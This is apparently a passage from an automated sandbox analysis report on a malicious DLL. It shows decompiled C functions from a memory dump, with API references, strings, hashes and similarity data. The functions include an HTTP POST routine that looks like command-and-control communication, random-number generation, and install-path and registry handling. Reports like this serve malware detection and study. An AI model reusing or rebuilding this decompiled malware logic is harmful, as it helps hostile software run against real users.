				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x1000e671
0x1000e683
0x1000e68c
0x1000e696
0x1000e69a
0x1000e6ab
0x1000e6c2
0x1000e6cf
0x1000e6dc
0x1000e6e9
0x1000e6ec
0x1000e6f1
0x1000e6f6
0x1000e6f8
0x1000e700
0x1000e70b
0x1000e712
0x1000e71e
0x1000e721
0x1000e72f
0x1000e732
0x1000e738
0x1000e739
0x1000e73b
0x1000e744
0x1000e745
0x1000e74a
0x1000e750
0x1000e75a
0x1000e75c
0x1000e761
0x1000e761
0x1000e770
0x1000e77f
0x1000e783
0x1000e792
0x1000e795
0x1000e79a
0x1000e79e
0x1000e7a5
0x1000e7ac
0x1000e7b4
0x1000e7bc
0x1000e7c3
0x1000e7cb
0x1000e7d3
0x1000e7da
0x1000e7e2
0x1000e7ea
0x1000e7ff
0x1000e80c
0x1000e80e
0x1000e813
0x1000e813
0x1000e81a
0x1000e82b
0x1000e830
0x1000e832
0x1000e832
0x1000e846
0x1000e858
0x1000e85a
0x1000e85d
0x1000e862
0x1000e862
0x1000e869
0x1000e878
0x1000e87c
0x1000e8ba
0x1000e8bf
0x1000e8c7
0x1000e8cc
0x1000e8d7
0x1000e8dd
0x1000e8e7
0x1000e8ea
0x1000e8f3
0x1000e8f8
0x1000e8f8
0x1000e901
0x1000e94a
0x1000e94c
0x1000e953
0x1000e954
0x1000e957
0x1000e95d
0x1000e961
0x1000e962
0x1000e967
0x1000e969
0x1000e96f
0x1000e984
0x1000e98c
0x1000e9c1
0x1000e9c6
0x1000e9cb
0x00000000
0x1000e9cd
0x1000e98e
0x1000e990
0x1000e990
0x1000e999
0x1000e99c
0x1000e99e
0x1000e9a0
0x1000e9a6
0x1000e9a6
0x1000e9ab
0x1000e9ad
0x1000e9b4
0x1000e9b4
0x00000000
0x1000e9b7
0x1000e971
0x1000e979
0x00000000
0x1000e903
0x1000e903
0x1000e909
0x1000e90f
0x1000e912
0x00000000
0x1000e912
0x1000e901
0x1000e87e
0x1000e884
0x1000e888
0x1000e889
0x1000e88e
0x1000e890
0x1000e896
0x1000e8b4
0x1000e8b4
0x00000000
0x1000e8b4
0x1000e898
0x1000e8a2
0x1000e8a4
0x1000e8a5
0x1000e8aa
0x1000e8ac
0x1000e8b2
0x00000000
0x00000000
0x00000000
0x1000e86b
0x1000e86b
0x1000e914
0x1000e914
0x1000e91a
0x1000e91d
0x00000000
0x1000e91d
0x1000e81c
0x1000e81c
0x1000e91f
0x1000e91f
0x1000e925
0x1000e928
0x00000000
0x1000e928
0x1000e81a
0x1000e785
0x1000e92a
0x1000e92d
0x1000e92f
0x1000e932
0x1000e935
0x1000e93e
0x1000e943
0x00000000
0x00000000
0x1000e947
0x00000000
0x1000e947
0x1000e754
0x00000000

APIs

memset.MSVCRT ref: 1000E69A
memset.MSVCRT ref: 1000E6AB
memset.MSVCRT ref: 1000E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E785

Strings

POST, xrefs: 1000E84B

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x100116c1
0x100116c8
0x100116d1
0x100116d5
0x10011750
0x00000000
0x10011752
0x100116e3
0x100116e5
0x100116ea
0x00000000
0x00000000
0x100116f2
0x100116f4
0x100116f9
0x00000000
0x00000000
0x10011703
0x10011707
0x00000000
0x00000000
0x10011709
0x1001170e
0x10011710
0x10011711
0x10011715
0x1001171b
0x00000000
0x00000000
0x10011726
0x1001172f
0x10011733
0x00000000
0x00000000
0x10011735
0x10011737
0x1001173f
0x10011741
0x10011742
0x1001174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701

Strings

CryptAcquireContextA, xrefs: 100116DD
CryptGenRandom, xrefs: 100116EC
advapi32.dll, xrefs: 100116C3
CryptReleaseContext, xrefs: 100116FB

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764

Uniqueness

Uniqueness Score: -1.00%

Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x10012125
0x1001212a
0x1001212e
0x1001212e
0x10012133
0x10012138
0x10012139
0x1001213c
0x1001213d
0x10012142
0x10012145
0x10012146
0x1001214b
0x10012152
0x100121f8
0x100121f8
0x00000000
0x10012161
0x10012161
0x10012168
0x1001216c
0x10012173
0x1001217c
0x1001217e
0x1001217e
0x1001217c
0x1001218d
0x100121b3
0x100121bc
0x100121be
0x100121c4
0x100121f3
0x100121f3
0x100121fb
0x100121fe
0x100121fe
0x100121c6
0x100121c7
0x100121cd
0x100121cf
0x100121cf
0x100121d4
0x100121d3
0x100121d3
0x100121db
0x100121e7
0x100121f1
0x100121f1
0x00000000
0x1001219d
0x1001219d
0x1001219d
0x100121a3
0x00000000
0x00000000
0x100121a5
0x100121ab
0x100121b0
0x00000000
0x100121b0
0x1001218d

APIs

_snprintf.MSVCRT ref: 10012146
localeconv.MSVCRT ref: 10012161
strchr.MSVCRT ref: 10012173
strchr.MSVCRT ref: 10012184
strchr.MSVCRT ref: 10012192
strchr.MSVCRT ref: 100121B7

Strings

%.*g, xrefs: 1001213D

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10010332
qsort.MSVCRT ref: 100105B0

Strings

true, xrefs: 10010309
false, xrefs: 10010315
%I64d, xrefs: 10010324
null, xrefs: 100102F7

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x8a40590
					_t125 =  *0x1001e68c; // 0x8abfc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x8a40590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x8a40590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x8a40590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x8a40590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x8a407b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x8a40590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x8abfaa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x8abfaa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x10004a0b
0x10004a18
0x10004a23
0x10004a28
0x10004a2a
0x10004a2d
0x10004a32
0x10004a35
0x10004a3f
0x10004a41
0x10004a4e
0x10004a57
0x10004a57
0x10004a64
0x10004a7f
0x10004a86
0x10004a88
0x10004a8d
0x10004a92
0x10004a98
0x10004aa7
0x10004ac6
0x10004ac8
0x10004ace
0x10004ad4
0x10004ad9
0x10004add
0x10004ae0
0x10004aea
0x10004aec
0x10004aed
0x10004af8
0x10004afa
0x10004afd
0x10004b02
0x10004b09
0x10004b5e
0x10004b5e
0x10004b63
0x10004bca
0x10004bcf
0x10004bd1
0x10004bdb
0x10004be0
0x10004be0
0x10004bfa
0x10004bfc
0x10004bff
0x10004c01
0x00000000
0x00000000
0x10004c07
0x10004c11
0x10004c1a
0x10004c1f
0x10004c22
0x10004c28
0x10004c2e
0x10004c36
0x10004c38
0x10004c3b
0x10004c3c
0x10004c41
0x10004c44
0x10004c47
0x10004c49
0x10004c4d
0x10004c4d
0x10004c52
0x10004c55
0x10004c57
0x10004c5b
0x10004c5b
0x10004c62
0x10004c67
0x10004c69
0x10004c6d
0x10004c6f
0x10004c75
0x10004c79
0x10004c7c
0x10004c7d
0x10004c82
0x10004c85
0x10004c8a
0x10004cb2
0x10004cb8
0x10004cbf
0x10004cce
0x10004cd3
0x00000000
0x10004cd3
0x10004cc1
0x00000000
0x10004c8c
0x10004c8c
0x10004c91
0x10004c98
0x10004cdd
0x10004cdd
0x10004ce4
0x10004ce8
0x10004ce9
0x10004ce9
0x10004cf3
0x10004cf8
0x10004cfb
0x10004cfc
0x10004cfe
0x10004d00
0x10004d05
0x10004d0c
0x10004d4f
0x10004d0e
0x10004d13
0x10004d1b
0x10004d1f
0x10004d2a
0x10004d35
0x10004d3d
0x10004d41
0x10004d49
0x10004d49
0x10004d0c
0x10004d55
0x10004d58
0x10004d5a
0x10004d60
0x10004d60
0x10004d62
0x10004d62
0x00000000
0x10004d62
0x10004c9a
0x10004c9a
0x10004ca0
0x10004ca2
0x10004ca7
0x10004ca7
0x10004ca9
0x10004cd8
0x00000000
0x10004cd8
0x10004cab
0x10004ae4
0x10004ae4
0x00000000
0x10004ae4
0x10004c8a
0x10004b69
0x10004b77
0x10004b8a
0x10004b8f
0x10004b95
0x10004b97
0x10004baf
0x10004bb4
0x10004bbd
0x10004bc3
0x00000000
0x10004bc3
0x10004b9f
0x10004ba8
0x00000000
0x10004ba8
0x10004b0b
0x10004b11
0x10004b13
0x10004b51
0x10004b53
0x00000000
0x00000000
0x10004b55
0x10004b59
0x00000000
0x10004b59
0x10004b15
0x10004b1f
0x10004b2b
0x10004b36
0x10004b3d
0x10004b47
0x10004b4c
0x00000000
0x10004b4c
0x10004ae2
0x00000000
0x10004a66
0x10004a71
0x10004a77
0x10004a79
0x10004d64
0x10004d64
0x10004d66
0x10004d6c
0x10004d6c
0x00000000
0x10004a79

APIs

memset.MSVCRT ref: 10004A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D1F
lstrcatW.KERNEL32 ref: 10004D3D
lstrcatW.KERNEL32 ref: 10004D41
lstrcatW.KERNEL32 ref: 10004D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D4F

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D75C
SysAllocString.OLEAUT32(?), ref: 1000D764
SysAllocString.OLEAUT32(00000000), ref: 1000D778
SysFreeString.OLEAUT32(?), ref: 1000D7F3
SysFreeString.OLEAUT32(?), ref: 1000D7F6
SysFreeString.OLEAUT32(?), ref: 1000D7FB

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X, xrefs: 10010911
@, xrefs: 10010865
\u%04X\u%04X, xrefs: 10010950

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

